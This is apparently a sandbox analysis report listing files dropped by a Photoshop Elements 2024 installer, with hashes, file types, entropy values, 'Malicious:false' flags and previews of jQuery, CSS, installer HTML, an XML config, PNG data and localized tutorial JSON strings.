                                                                                                      SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                      MD5:E1288116312E4728F98923C79B034B67
                                                                                                      SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                      SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                      SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                      Malicious:false
                                                                                                      Preview:/*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (3604), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3706
                                                                                                      Entropy (8bit):5.0009523549199875
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:XpxMlW2VBVevM90XmMYitDRhlE7vzWxeJ:TMA2HVWYYhK7vF
                                                                                                      MD5:E13F16E89FFF39422BBB2CB08A015D30
                                                                                                      SHA1:E7CACAF84F53997DD096AFD1C5F350FD3E7C6CE9
                                                                                                      SHA-256:24320ADD10244D1834052C7E75B853AA2D164601C9D09220A9F9AC1F0AE44AFE
                                                                                                      SHA-512:AAD811F03F59F799DA4B8FC4F859B51C39F132B7DDBFFADABE4EC2373BD340617D6FE98761D1FB86D77606791663B387D98A60FBA9CEE5D99C34F683BCB8D1F9
                                                                                                      Malicious:false
                                                                                                      Preview:/* HTML5 Placeholder jQuery Plugin - v2.3.0.. * Copyright (c)2015 Mathias Bynens.. * 2015-11-13.. */..!function (a) { "function" == typeof define && define.amd ? define(["jquery"], a) : a("object" == typeof module && module.exports ? require("jquery") : jQuery) }(function (a) { function b(b) { var c = {}, d = /^jQuery\d+$/; return a.each(b.attributes, function (a, b) { b.specified && !d.test(b.name) && (c[b.name] = b.value) }), c } function c(b, c) { var d = this, f = a(this); if (d.value === f.attr("placeholder") && f.hasClass(n.customClass)) if (d.value = "", f.removeClass(n.customClass), f.data("placeholder-password")) { if (f = f.hide().nextAll('input[type="password"]:first').show().attr("id", f.removeAttr("id").data("placeholder-id")), b === !0) return f[0].value = c, c; f.focus() } else d == e() && d.select() } function d(d) { var e, f = this, g = a(this), i = f.id; if (!d || "blur" !== d.type || !g.hasClass(n.customClass)) if ("" === f.value) { if ("password" === f.type) { if (!
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:assembler source, ASCII text, with very long lines (576), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16678
                                                                                                      Entropy (8bit):5.078437835720232
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Mk4wZnKPB1d/2NUyhyNbaXDwBrgDxOsJHPYKXZXXiTEjO9izHzW/SQ:9XBzzgKXZXyQKizw
                                                                                                      MD5:EE23E36C90C9FCCD530504285D371AC3
                                                                                                      SHA1:7A4E24D18EC723D38CD922E3845FF290F0299E15
                                                                                                      SHA-256:32616E0764C80EFB4607A0DCCFEC7CF7862886C4AE80E6405DC3CC5C62CD0F82
                                                                                                      SHA-512:542937075A96F6AFB8170C6F41915EFEEC5E067803606C2A26D29E6C990D93A255AD8CEA18600CD0825A0C91FF935D057870A1724062543A8E2BC09C4041B375
                                                                                                      Malicious:false
                                                                                                      Preview:body {.. line-height: normal;.. font-family: 'Adobe Clean', sans-serif;.. height: 650px;...height:40.625rem;.. margin: 0;.. -webkit-user-select: none;.. cursor: default;..}.....container {.. height: 100%;..}....#piiScreenIcon {.. width:100%;..}....#piiScreenIconImage{.. display:block;.. margin: auto auto;..}....#piiScreenTitle {.. margin-top:10px;.. text-align : center;.. line-height: 36px;..}.....consistantPad {.. padding: 30px;.. padding: 1.875rem;..}.....pull-left {.. float: left;..}.....pull-right {.. float: right;..}.....text-center {.. text-align: center;..}.....mainContainer {.. width: 446px;.. width: 27.875rem;.. height: 650px;.. height: 40.625rem;..}.....header {...height: 65px;.. height: 4.0625rem;.. background: #1c1c1c;..}....#marketingIFrameDiv {.. height: 585px;.. height: 36.5625rem;.. width: 100%;.. display: none;..}.....centerMid {.. position: absolute;.. top: 0;.. bottom: 0;..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8889
                                                                                                      Entropy (8bit):4.390770211617367
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:kPmVwag1t6ZfB6FkWuHKH5BuMt1IvodJiLWkp0pGhG:WmV/g1t61B6GWpjrdJCWME
                                                                                                      MD5:F4B7942D6563727BD614F10DA0F38445
                                                                                                      SHA1:84F22240F7A5ED1C23B09E8677AC2AC3CD4E26F9
                                                                                                      SHA-256:E4BEDDE22ED405D291C746440A824D5F8527FB232E7A6BE2ED9A76465D82F8DC
                                                                                                      SHA-512:F79B24AC78863A4ED87D41F37B2A5BC27017EBC5317F0A305D676090A16AEE8A61384B476E7E9A68A024AA8DA4784C1BD4F118766CAF4450EC97AF430E7074AF
                                                                                                      Malicious:false
                                                                                                      Preview:<!DOCTYPE html>..<html style="width: 100%; height: 100%; overflow:hidden;">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10" />.. <title>Adobe Installer</title>.. <link rel="stylesheet" type="text/css" href="clean.css">.. <link rel="stylesheet" type="text/css" href="main.css">.. <link rel="stylesheet" type="text/css" href="common.css">....</head>....<body onload="onLoadComplete()">.. <div class="container">.... <div id="spinnerScreen" class="screen">.. <div class="spinnerContent centerMid">.. <img id="spinnerScreenImage" class="imageSpinner" />.. <span id="spinnerScreenText" class="spinnerScreenText"></span>.. </div>.. </div>.... <div class="screen consistantPad" id="surveyScreen">.. <div class="screenHead">.. <img id="surveyScreenIcon" />.. <span id="surveyScreenTitle" class="screenTitle"></span>..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (371), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):59941
                                                                                                      Entropy (8bit):5.0285479750353765
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:qMb4bHj7Bqyb6fa8xtFfs5OsKwHV7NYb2gROlIHKMUyup9c/ory985r/Mv6GN8zj:qMb4bHj7Bn6faMtFfs5OsKwHV7NYb2gq
                                                                                                      MD5:A8F9EB478C7512C98CA1AD46DBCC298A
                                                                                                      SHA1:454226DC42B911CAAFC9A1E56D8AD0000BBB7643
                                                                                                      SHA-256:1DF6CBDC80C1DF47D93D6E7516A2D7017362413A6B9D93634E143856695C3645
                                                                                                      SHA-512:AE3198CC6AE739F3009359988F5C090664E5FE8422AD1CF739FE316E66F344C10385D1F841C7B0E3CA9F7997C79D95FA0559386B6DEC10641CEB8C290B14F5B3
                                                                                                      Malicious:false
                                                                                                      Preview:/*************************************************************************..*..* ADOBE CONFIDENTIAL..* ___________________..*..* Copyright 2015 Adobe Systems Incorporated..* All Rights Reserved...*..* NOTICE: All information contained herein is, and remains..* the property of Adobe Systems Incorporated and its suppliers,..* if any. The intellectual and technical concepts contained..* herein are proprietary to Adobe Systems Incorporated and its..* suppliers and are protected by trade secret or copyright law...* Dissemination of this information or reproduction of this material..* is strictly forbidden unless prior written permission is obtained..* from Adobe Systems Incorporated...**************************************************************************/..var popUpShownOnce = false;..var lastScreenShown = null;..if (!Array.prototype.indexOf) {.. Array.prototype.indexOf = function (obj, start) {.. for (var i = (start || 0), j = this.length; i < j; i++) {.. if (t
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):537
                                                                                                      Entropy (8bit):5.147241145555799
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:TMHdtTyKAywopOGmNTWe7SJJnPd+p3mv9NhuaAi4HY2:2dtTgopj2GJJnPd+p3mvXB2
                                                                                                      MD5:9BF27F7E06B54FC3711224323D4FA105
                                                                                                      SHA1:F870330D52A34C4E3F475CE117E779A510FF3501
                                                                                                      SHA-256:195A6EEB37951C00E8A3CD3366F0BE21AB9AA4124379D5B8EC468A9368F477FD
                                                                                                      SHA-512:4727BE8B5C550F3B578360512FC243CA9599112B44088066F6204B09D30238BC51100E1B45DDD549DAE0F5990A924216CC0330AAB9B036B8AB445D44306BDEC0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<Config>...<UIConfig>....<HideVersion>true</HideVersion>....<SkipLaunch>false</SkipLaunch>....<HidePIIScreen>false</HidePIIScreen>....<ShowInstallOptions>true</ShowInstallOptions>....<CarouselType>GenericCarousel</CarouselType>....<SkipAccLaunch>true</SkipAccLaunch>....<LaunchProductDetail>.....<ProductInfo>......<SAPCode>HPSE</SAPCode>......<BaseVersion>24.0</BaseVersion> ......<Platform>win64</Platform>.....</ProductInfo>....</LaunchProductDetail>...</UIConfig>..</Config>..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 88 x 84, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3054
                                                                                                      Entropy (8bit):7.920741815156119
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:EetobvO+qOt7dLQDys5pZBAmoM67nXGzwONXAyP+RNONUTRbUc:EetOhlldkDy6ploN7O3NQyoON2F
                                                                                                      MD5:EB5FDB63686193E55826A8DD77D64412
                                                                                                      SHA1:977C4788ABF0F274E74281C4DA76C0C3D2F26B76
                                                                                                      SHA-256:1DBCFFB6B2837F5C42CC90713F01F7E7E82B45337DE78B1204F67E0AD7FA488B
                                                                                                      SHA-512:C3849CC0A289A36A70E7B4968BC379E118CA80D3E87AFF2477FD7FBD514B66CD67E199B17B41277A6F3C8794B88CC69532B233016BFEC2EE98D3F0C17DBBC4E8
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR...X...T......W.O....pHYs...........~.....IDATx..]kl...>k....c.6v.....HL....*.,."..(U..*?Z....O!R.3.....?m.T.R5.............$.B.%P.K.~?.56.1[}.{.y..;............{.;.L&Cv.5o]EDOd.{......"ED...a..I...;+.C.[A.A"...%...h_&....~.....&.....0.......2..I.5...{....9.9"..\..c.\O.g...#8..F.wPi..TT..G.#9.8.|.[....vRq.v`2......Q..i.5.#.K.,.....l.p6.+)o.@5...0..T_.]O....$a#..."...z8.g.k.X5.@...0....8....b...}....q.j.,.>8TRjx...e.?.6.N.t..qO1..MD..l...r.j.Ozh...4.........T.f.........^.+$A..hU...}.)*.........f..i o:...E.,....*[6Q.8L..Lt.....,6....*o._.m..{P...,.$fG/S8.`..........O..u.NP....Tk.^..q=..M]:mz...>....&]........|zL...(.>..5To.M......Y....P.............P>$...a_.....Xu! 0...aY..Stc...y@....8L..&..\..#Q....w....ZaCWF... ...B.....Vw.....%_..`#a..^.%....>[!.X.!oB.;.F.6s.".?=)........6.B.g.R..B..N...4@.FO......Z.!,.B.I4.........&k....A.....;!...J.}%...'T~..9E...o..+.J..?...g..R....... ....Q......c....z..F.B...Za.FN.Z..+X(".d.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 176 x 168, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6367
                                                                                                      Entropy (8bit):7.956445451701175
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:h9MSclSloV7H9lto+rXTyjlWRixx1dYsxe:LtXo1H9Po+rDyjlWRiXXYv
                                                                                                      MD5:2152D117D6E4FDEB0510DA1FDCEAE7E3
                                                                                                      SHA1:ACD10C0B6653041E6CE4241DCCEF1445D12E2DB8
                                                                                                      SHA-256:4A95D46DAC22AA1477093EB7B5655A73C3C7152A985AB7A5148327E93309F985
                                                                                                      SHA-512:5A7AF9736FC3C7329FC680BBAA80FDD8D74F0D98D2422CC57C64B78A30D3C68F799F5E584CF1D6D283B6E827FC391130484C2726D59C70D97AE2D0774239AF2F
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR.............@2d.....pHYs...........~.....IDATx..m...y..o.+{.eaYb_..c.cC0.j-...VPLJbT\.......P..*.Kl.%}.j>......$;2.....G1...v....).0....e.e..n.?{g=wv.33..y.I.6./s...3..9.y&S,.I..\..D.?..(KD.Y.N. .a":FD...}.+.l.gr=;.hKI..R_<%.. d".W.....3H.p&...^$...hS8@...b.../..3......h{...x....b.o..W....\.".T.)>.v..........#.../."...Nn..W.8...Rr..xSd.M.+iL.a.gr=......(...[..B)D&..z......|...[r#p*...^.#.....T.)a...NTL!J....t5..T.]Lu....L..Da.n_=...%....}..>...K..cI2lM....G..u.../N..K....hj....%.|..Jl....R."m..*.......3.... .5../..VY..9......./..]..g)S;..s....>...?Rrl)..T...2..2..z..%!u@...9O.53=V....Is.`@*...;a.B.JJ....xAuc+...c...e..4:.l.....K.w...uZ.......45z..#..#..(QU[O.VnPv.M..Xj.|.{..%.j......>@X...1..+......uVb.j..G7..8.....|....K..#.....M/8>..r`wY....|...^H.........U.[T.q.1t|.........C...wO"L....f.....A..t...~..Z.:..5O1az!5zR`iD..~........H.....|..{..JT.a....X.IW.|..jj]....>...!.;1r...t..W0Y...G..L.. S]#.\<.....tg.6{....!
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1015
                                                                                                      Entropy (8bit):5.284650663061944
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:M0X5cRWm36aKQgO3lcQgj8fPJmKhxRR+SPoy1KaY4ScBhPbxZtqy3Ui:l566JQgC7gYfPRhx6SPo1/LcXNZtp
                                                                                                      MD5:44DB45EFBB65BAC062FB7C8B849A203D
                                                                                                      SHA1:00E75EA3FADB83DFC42616DEDF831F6BF8017EDC
                                                                                                      SHA-256:3D4D96649072E293B76A41A497B19BC48811B2C8BE9D2742255B96751BC09FEB
                                                                                                      SHA-512:683D31755D68816B6CD575956C2161FF92A89C4B8C6D188683E435E6C4BE5DA621FF9819DA65EFB524C1983395154DA8DAE98ED94F236A71517BF13CE519A64B
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "V.ukov. lekce k aplikaci Photoshop Elements",.. "SubTitle": "Za.n.te, nau.te se z.klady a nechte se inspirovat.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64bitov. verze) (minim.ln. po.adavek)",.. "OperatingSystemMac": "Mac OS 10.12 (minim.ln. po.adavek)",.. "Memory": "Instalace aplikace vy.aduje alespo. 4 GB pam.ti RAM",.. "TextSlide1": "Sjedno.te barvu a.t.n s.jinou fotografi. nebo vyu.ijte p.ednastaven..",.. "TextSlide2": "Vytvo.te stylizovan. text za p.r sekund.",.. "TextSlide3": "Vytv..ejte a sd.lejte foto p.sma ve form.tu MP4.",.. "TextSlide4": "Jedn.m kliknut.m vyb.rejte oblohu nebo pozad.. ",.. "TextSlide5": "Nov., osv..en. podoba - se sv.tl.mi a tmav.mi re.imy.",.. "TextSlide6": "Plus",.. "TextSlide7": "Panel Rychl. akce pro .pravy jedn.m kliknut.m",.. "TextSlide8": "Integrace slu.by Adobe Stock",.. "TextSlide9": "Aktualizace webov. a.mobiln. verze ",.. "TextSlide10": "(betaverze pouze v.an
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):946
                                                                                                      Entropy (8bit):4.953889317998113
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ARWqWN36awP3lc90XpYn9VVRndMMAEBzSKhm5tG9kx:vX6hfyXn9523GI5tV
                                                                                                      MD5:1FBC842F9A1E6F76E6ACF661816FE62E
                                                                                                      SHA1:D8B0EC6941246B4B423C1A15467EFBCAEC8121A7
                                                                                                      SHA-256:5D6ABD25084CBF6F04D54C0164E5E0B3F89D969A91E2E850C7DAE77588E571B8
                                                                                                      SHA-512:58A0A04E76B0D0F35EAA01B03F37DFBBEDD60279FFCCB26CC4FD34F6562DD8ECA8CF1891578861A06C393AA82A5E41537618D6598E4080264FBB1B4C7B024170
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements . Tutorials",.. "SubTitle": "Erste Schritte, Grundlagen, Inspirationen.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-Bit) (mindestens erforderlich)",.. "OperatingSystemMac": "Mac OS 10.12 (mindestens erforderlich)",.. "Memory": "Sie ben.tigen mindestens 4 GB RAM, um die Anwendung zu installieren",.. "TextSlide1": "An Farbe und Ton eines anderen Fotos anpassen oder Vorgaben nutzen.",.. "TextSlide2": "Stilisierten Text in Sekundenschnelle erstellen.",.. "TextSlide3": "MP4-Foto-Reel erstellen und teilen.",.. "TextSlide4": "Einen Himmel oder Hintergrund per Mausklick ausw.hlen.",.. "TextSlide5": "Neuer, frischer Look . mit Hell- und Dunkel-Modi.",.. "TextSlide6": "Plus",.. "TextSlide7": "Schnellaktionen zur kinderleichten Bearbeitung",.. "TextSlide8": "Integration mit Adobe Stock",.. "TextSlide9": "Web- und Mobil-Updates ",.. "TextSlide10": "(Beta nur in englischer Sprache)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):835
                                                                                                      Entropy (8bit):5.02637898118712
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:RMRWsRVg6aE3lchllo8ElVwsa5kHgN7FYtQ:RDso6vEWRl6RyANh
                                                                                                      MD5:BA0A234966CC8F97101F456C96AC4632
                                                                                                      SHA1:8D00C13D7EF727210996BAD946F763B9FDB69FB0
                                                                                                      SHA-256:168D3D6C0C91C0850865733EB244760F6BB3DE0902395A443AFC44B02592A048
                                                                                                      SHA-512:391F67878830E4C907EEB5A387B94E411A9862559677264AC18A19A36840035520DE7E40B5BEE041483C1AC6B66D3ABDD389E7502C423D6FC701AB2088580D6E
                                                                                                      Malicious:false
                                                                                                      Preview:{..."Name":."Photoshop Elements tutorials",..."SubTitle":."Get started, get the essentials, get inspired.",..."Operating1xWin": "Windows 7 Service Pack 1 (64-bit) (Minimum required)",.. "OperatingSystemMac": "Mac OS 10.12 (Minimum required)",.. "Memory": "You need minimum 4Gb RAM to install the application",..."TextSlide1": "Match the color & tone from another photo or use presets.",..."TextSlide2": "Create stylized text in seconds.",..."TextSlide3": "Create & share MP4 Photo Reels.",..."TextSlide4": "One-click to select a sky or background.",..."TextSlide5": "New refreshed look . with light and dark modes.",..."TextSlide6": "Plus",..."TextSlide7": "Quick Actions panel for one-click edits",..."TextSlide8": "Adobe Stock integration",..."TextSlide9": "Web & mobile updates ",..."TextSlide10": "(English-only beta)"..}..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):970
                                                                                                      Entropy (8bit):4.889772694170443
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ycRW05836yd3lcsRmz42/gcA69PAHxZDx8lHntBKvsI:qYY6evB2/GWlHntBAsI
                                                                                                      MD5:6D77FA7C087128F0DDACB5D1C86C95E2
                                                                                                      SHA1:668E0CA6D419FA09A4DB81BC8469BAF686835A46
                                                                                                      SHA-256:320A7B8CD564064EC11925C96F0F323B19FFC82440439C4B87ABFF59A658F1E5
                                                                                                      SHA-512:2F66150B342F41F2968B44001EE53F6457081DD58A715DDF68DFFAE3B5213643AA7BB6435E7DFDAB518533EFDD0A407412B8DF9948A7CAAB14A34BE6C6377CDC
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Tutoriales de Photoshop Elements",.. "SubTitle": "Empiece, descubra los fundamentos y encuentre inspiraci.n.",.. "Operating1xWin": "Windows 7 con Service Pack 1 (64 bits) (m.nimo requerido)",.. "OperatingSystemMac": "Mac OS 10.12 (m.nimo requerido)",.. "Memory": "Se necesita un m.nimo de 4.GB de RAM para instalar la aplicaci.n",.. "TextSlide1": "Combine el color y el tono de otra foto, o bien utilice ajustes preestablecidos.",.. "TextSlide2": "Cree un texto estilizado en segundos.",.. "TextSlide3": "Cree y comparta reels de fotos en MP4.",.. "TextSlide4": "Haga clic una vez para seleccionar un cielo o fondo.",.. "TextSlide5": "Nuevo estilo renovado con modos claro y oscuro.",.. "TextSlide6": "M.s",.. "TextSlide7": "Panel Acciones r.pidas para realizar ediciones con un solo clic",.. "TextSlide8": "Integraci.n con Adobe Stock",.. "TextSlide9": "Actualizaciones web y m.viles ",.. "TextSlide10": "(Beta solo en ingl.s)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1027
                                                                                                      Entropy (8bit):5.00331328127714
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:x6cRWqKJ36hxMM3lQCidzBjNR2NPjyFBWdsBXJKAvE1uoXutXUB9Rn:gqKB6hxt+B1jNR2NVdsBZrvNyutkpn
                                                                                                      MD5:CC854F1036F7591BF00E2AFEB465F659
                                                                                                      SHA1:60457317A8F7F241C3F94595C13E37F4A8DC3352
                                                                                                      SHA-256:67A1C6394300FB01B4DF5C8D1ECCA0AB026797BD2C1BEB09084BEA356DF89754
                                                                                                      SHA-512:8A26F56E1E6861C1CFCF07F8349AD0F32FC60D962E5433997B7F6F8B7D361F172A8CDB9717297EC91ECD7989A88B1A93D696382BA5852723528DBACD50F70D8E
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Tutoriels Photoshop Elements",.. "SubTitle": "Lancez-vous, saisissez l'essentiel, soyez inspir..",.. "Operating1xWin": "Windows.7.Service.Pack.1 (64.bits) (minimum requis)",.. "OperatingSystemMac": "Mac.OS.10.12 (minimum requis)",.. "Memory": "Vous avez besoin de 4.Go de m.moire vive minimum pour installer l'application.",.. "TextSlide1": "Faites correspondre la couleur et le ton d.une autre photo ou utilisez des param.tres pr.d.finis.",.. "TextSlide2": "Cr.ez du texte stylis. en quelques secondes.",.. "TextSlide3": "Cr.ez et partagez des Bobines de photos MP4.",.. "TextSlide4": "Un seul clic pour s.lectionner un ciel ou un arri.re-plan.",.. "TextSlide5": "Nouveau look revisit. avec les modes clair et fonc..",.. "TextSlide6": "Plus",.. "TextSlide7": "Panneau Actions rapides pour les modifications en un clic",.. "TextSlide8": "Int.gration dans Adobe Stock",.. "TextSlide9": "Mises . jour Web et mobiles ",.. "TextSlide10": "(Version beta
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):970
                                                                                                      Entropy (8bit):4.801728131561229
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Ym3cRWV9z36aMR13lcqR+8WI69y/2TEeeQIMcwmx4LeJqASUtXIH:JDP61FBvWI693IA5ASUtXo
                                                                                                      MD5:37879C31149C21FB5DF9DAADCD67E909
                                                                                                      SHA1:20E314739D229E4B5DA2AF435BB0F251C06DB0C9
                                                                                                      SHA-256:17AC21F4AD75970E29C644CAC412483B4AB3B5611807E6C963FB72189AD9989B
                                                                                                      SHA-512:CF29AC25D8DE0E0AD658B02AF25A0B88CE643F26679BE2B3F2E944E4B558FACBA94804CC88C32F550395708D0BDA003AD09FCBBFA2A9FA8FB70820F7775E0113
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Esercitazioni di Photoshop Elements",.. "SubTitle": "Iniziate, raccogliete tutto ci. che vi serve e lasciatevi ispirare.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64 bit) (versione minima richiesta)",.. "OperatingSystemMac": "Mac OS 10.12 (versione minima richiesta)",.. "Memory": "Sono necessari almeno 4 Gb di RAM per installare l'applicazione",.. "TextSlide1": "Abbina il colore e il tono di un'altra foto o utilizza le preimpostazioni.",.. "TextSlide2": "Crea testo stilizzato in pochi secondi.",.. "TextSlide3": "Crea e condivi i reel di foto in MP4.",.. "TextSlide4": "Fai clic per selezionare un cielo o uno sfondo.",.. "TextSlide5": "Look rinnovato, con modalit. luce e buio.",.. "TextSlide6": "Pi.",.. "TextSlide7": "Pannello Azioni rapide per modifiche con un clic",.. "TextSlide8": "Integrazione con Adobe stock",.. "TextSlide9": "Aggiornamenti Web e per dispositivi mobili ",.. "TextSlide10": "(Beta solo in inglese)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1127
                                                                                                      Entropy (8bit):5.56961836864283
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ARWOlFK2G5e36asK3lc32QV6XGS8kDqbzEzxQciMCj7EOL0uo8fJNoNYnXe8r:va0h5y65mA2N8hWu5pzxWNYnuo
                                                                                                      MD5:C31570E7CCB0FC3A4236B98ABBD0CC08
                                                                                                      SHA1:33AFEC87102C157C7A7B80D0058F40F591E0BBC3
                                                                                                      SHA-256:E645B23E361162F77EDB93AC9028F094C8CC316B2B9AAB88EA4690D43F554BFE
                                                                                                      SHA-512:6B3A2FF37B7EE09BB5FA55DE7F072647DE4F3A54E003C4D08860AB4335E3E2EBB0AB9D483AA853A77D46B2C65F02FCD7CBB5FD12B98C9A88F976D5E64759C035
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements .......",.. "SubTitle": "........................",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-bit) (..)",.. "OperatingSystemMac": "Mac OS 10.12 (..)",.. "Memory": "...................... 4GB . RAM ......",.. "TextSlide1": "................................",.. "TextSlide2": "....................",.. "TextSlide3": "MP4 .................",.. "TextSlide4": "1 ....................",.. "TextSlide5": "........................",.. "TextSlide6": "...",.. "TextSlide7": "..............................",.. "TextSlide8": "Adobe Stock
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):551
                                                                                                      Entropy (8bit):5.719924059723855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWzAwv/WgQYATnJPO4T3bu1BJGvdhEU3lcLD9gT6XOqjYkS9OTKHHVy1JZR:ARWswl8nVO+36UFKU3lcLM6XOqkpAU1O
                                                                                                      MD5:079C7C099407A71437825C7DF92A92B1
                                                                                                      SHA1:D8195B86E2FC055F86C6EBDF7BBED07A62157A1C
                                                                                                      SHA-256:7CBC5BC481D33E921C57652DA070E5536A2292169C8C000548BC9F3B5367B9A6
                                                                                                      SHA-512:D7E5FF122D86FDB82A4E939E87F0FFF794010A4C5F79FCE0DC0CCB59E9392B5DA7C52B1B99F2A33FA45998E58936A15B900F4AF385DF9684BC419E626D2634D7
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements ...",.. "SubTitle": ".... .. ... ... .....",.. "Operating1xWin": "Windows 7 ... . 1(64..)(.. .. ..)",.. "OperatingSystemMac": "Mac OS 10.12(.. .. ..)",.. "Memory": "....... ..... .. 4GB. RAM. ......",.. "TextSlide1": "._Instantly turn photos into works of art.",.. "TextSlide2": "._Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "._Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):950
                                                                                                      Entropy (8bit):4.827268491011639
